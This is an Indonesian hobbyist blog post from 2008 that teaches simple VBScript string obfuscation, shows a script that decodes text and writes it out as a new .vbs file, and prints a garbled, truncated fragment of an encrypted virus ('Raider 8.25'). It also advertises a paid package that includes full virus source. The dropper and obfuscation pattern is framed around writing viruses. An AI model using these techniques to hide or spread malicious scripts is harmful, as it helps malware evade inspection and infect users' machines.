MorphostLab

Tempat nongkrongnya Morphic dan kawan-kawan

Tutorial Encrypted VBS

Posted by Morphic pada Juni 18, 2008


*Nanti nyesal lo kalo baca tutorial ini

Tutorial kali ini gw mau jelasin sdikit ttg VBS neeeh, (Bagi yang udah bosan dengan VBS, jangan baca nanti nyesal lo)

Tutorial kita kali ini mengenai VBS

Ini dia cara mengenkrip paling sederhana:

function cu(b)

dim gai

dim i

for i = 1 to len(b) step 3

gai = mid(b,i,1)

cu=cu&mid(gai,1,1)

next

end function

msgbox cu(“VLHitQrGvuLWsDD”)

Kalo skrip diatas dijalankan maka akan muncul msgbox yang berisi “Virus”. Skrip yang itu masih terbilang sederhana, sekarang kita buat skrip yang lebih bagus tapi dengan metode yang sama:

lak=”mrsrgrbrorxr r” & chr(34) &”rmrorrrprhrircr” & chr(34) & “r”

har = cu(lak)

set bog=createobject(“scripting.filesystemobject”)

function cu(b)

dim gai, i

for i = 1 to len(b) step 2

gai = mid(b,i,1)

cu=cu&mid(gai,1,1)

next

end function

set tf = bog.createtextfile(“D:\morphic.vbs”,2,true)

tf.writeline har

Kalo skrip di atas dijalankan maka akan tercipta sebuah file vbs di direktori ”D:\morphic.vbs” yang berisi skrip: msgbox ”morphic”

Gw dah buat program untuk mengenkrip skrip dengan metode di atas:

Ketik script apa aja pada kotak teks di atas, misalnya: msgbox “saya hari ini sehat”

Lalu klik OK

Coba kamu jalankan hasil skrip diatas, yang akan terjadi adalah skrip itu akan menciptakan sebuah file vbs di direktori C:\windows\d.vbs yang berisi skrip kamu tadi. Skrip ini juga sekaligus akan menjalankan skrip di direktori C:\Windows\d.vbs” (Tiba-tiba pemikiran jahat membuat virus muncul!!!!!)

Eittss tunggu dulu, program ini sengaja gak gw sempurnain untuk menghindari penyalahgunaan orang-orang yang kayak gitu, (kalo mau kembangin sendiri ya udah ga pa pa). Program ini gw namain EncVBS

Berikut ini contoh source vbs yang terenkripsi: (virus Raider 8.25)

‘8.25

lO=” ­­­ ­


 [1]
=
­=|3|&|.70|:=|.|:­=|.­|:=|\|:=|%­% / |:‑=|/3#5/|:


=|R


‑­ |&­:



=|\
.



|}{­ =­­­(|


.


­|):­ 


=[1]­­(|



[1]:\\.\\


7|)}{­ =­­­(|






[1].


­­­|):­ 


=


.­­­(|­­ * 



87_­



[1]­|)}{­ ‑=.‑


­:=


.



­:



=.[1]­­


‑­(5)&:‑


=.[1]­­


‑­(6)&}{=.[1]­­


‑­(7)&:­=‑


&|­\|:


=­(,­
()-­
(


.



­))}{=|­­­(||


.


­||).
|:
=|\­
­|:
=|HKLM\­\­

­\
|&
&
&
}{
=(
,5):



=|| 


­

=


}{=|HKLM\­\|&
&:=|\­\


\



‑\­
­



\­­\|}{=|


­ ‑­\|:=(|HKLM|&&&|
|,5)&&:=(|HKCU|&&&|


­|,5)&}{‑=(|HKCU|&&&|‑­|,5)&:
=
———-Scriptnya gw potong sampe sini aja ya, kalo diterusin gak muat…..————

Kalo di liat sekilas kita gak bisa baca scriptnya gimana caranya donks, untuk membacanya perlu program untuk mendekripnya. Kebetulan gw dah bikin programnya kemarin. Memang sih gak semuanya terbaca, paling nggak terbaca 60% (paling nggak kita ngerti apa maksud virus itu). Nama programnya DecVBS

Pengen ama programnya? Yak nanti kita bicarakan di bawah ini ya,….

===============================================================================

Skalian gw mau promosi nee, ga pa pa kan?

Gw mau jual paket yang berisi:

-program yang akan gw jelasin di bawah ini

-Source code program yang gw jelasin di bawah ini

-Program DecVBS

-Source Code DecVBS

-Program EncVBS

-Source Code EncVBS

-Bonus 434 MD5 Virus

-Source code Full virus Raider 8.25

-Database Morphost ke-12 (17 Juli 2008)

-Source Code Morphost (Unthemed Courier)*

-Source Code Morphost (Luminous Terminator)*

-Source Code Morphost (Verdant Chlorophyl) Indonesian Version*

*Source code Morphost yang lama

Gw bikin program untuk mengkalkulasi crc32 dan MD5, skarang ini memang dah banyak sih program ntuk ngitung Checksum. Yah inilah program buatan gw

Cara untuk ngitung sebuah file ada dua cara:

1. Dengan mendrag sebuah file lalu mendropnya pada program

2. Dengan membrowse file dengan direktori program ini sendiri

Sori kalo gw promosi program ne,,

Bagi yang pengen program ini beserta source code nya boleh minta ama gw,

Karena gw blum punya ATM nee, kalian boleh isi pulsa gw. He he he 12x (komersil banget!)

Silakan Transfer Pulsa* ke nomor HandPhone-ku

Lalu kirim sms ke nomorku yang berisi alamat email kamu dan pesan kamu (juga boleh tulis nama kamu)

Nanti akan gw kirim link-nya beserta passwordnya ke email mu

*Supaya gw tahu siapa (nomor siapa) yang udah mentransfer pulsa dan siapa yang blom.

Trus satu lagi neeee,

Masih ingat Morphost Antivirus? Antivirus buatan gw?

Yap gw juga mau berbagi source codenya neeeh (source code Morphost yang lama).

Source nya ada tiga

1. Morphost (Unthemed Courier)

2. Morphost (Luminous Terminator)

3. Morphost (Verdant Chlorophyl) Indonesian Version

Sourcenya kumasukkan ke dalam paket di atas. Ingat ketiga source ini gak sama dengan Morphost ku yang beredar bosss. Pokoknya lumayanlah untuk di pelajari,,,

Untuk dapatin 3 source code ini silakan beli Paket di atas

[Bagi yang pengen tahu nomor Handphone ku silakan kirim email ke: karta_morphic@yahoo.co.id

Harap maklum kalo ku tulis di sini nanti banyak yang ngerjain gw. Ha ha ha (kepedean nee)]

[HATI-HATI PENIPUAN, MORPHIC TIDAK MEMUNGUT BIAYA LAIN SELAIN TRANSFER PULSA DI ATAS!]

Thankz atas perhtian smua…

Morphic,

Thankz to:

-Kawan-kawan gw yang ada di kelas XI IPA 10 (Smansa Medan)

-Dhika_Teepho, the girl whom I love so much..

-Ram_Zex, SoulHacker, Axer, fireboltDave

-Anak-anak Permata Setia Budi,,

-Hakz, anharku, new.bie33, Mas Aat, stupid_boy,

-all virologers

-kawan-kawan ku semuanya yang lain

14 Tanggapan to “Tutorial Encrypted VBS”

  1. Mr.SyarHAck said

    Maz Morph…..minta transfer pulsanya berapa….!!!

  2. Mr.SyarHAck said

    Maz tranfer pulsanya minta berapa…..!!!

  3. Satryacode said

    Satrya@ymail.com

    Mnt brp kw plsny??

    Klw d atas 30rb gk blh y…

    Ak mw sc morphost yg verdant chlorophyl

  4. Kholis Virologist said

    sekedar promo2
    kunjungi blog ku di http://www.1024.co.nr
    kenapa 1024 karena setiap 1kb=1024b setiap 1mb=1024kb setiap 1gb=1024mb 1tb=1024gb
    hehehehehe, apa hubungannya?
    wkwkwkwkwkwkwkwk

    kholis.3gp@gmail.com

  5. Kholis Virologist said

    Wehe
    mas no hpnya kirimin ke kholis.3gp@gmail.com
    oke, tak tunggu
    soale q butuh tu sc
    hehehehehehe
    sorry q g bisa lewat e-mail

  6. cantigi said

    morph, perasaan aku terus yg isi komen ya, promosiin atuh site ini… tapi tetap semangat kaaannn…😀 kelamaan engga update, jgn2 pengaruh wanita niy..😉 kidding.. :p

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

 
%d blogger menyukai ini: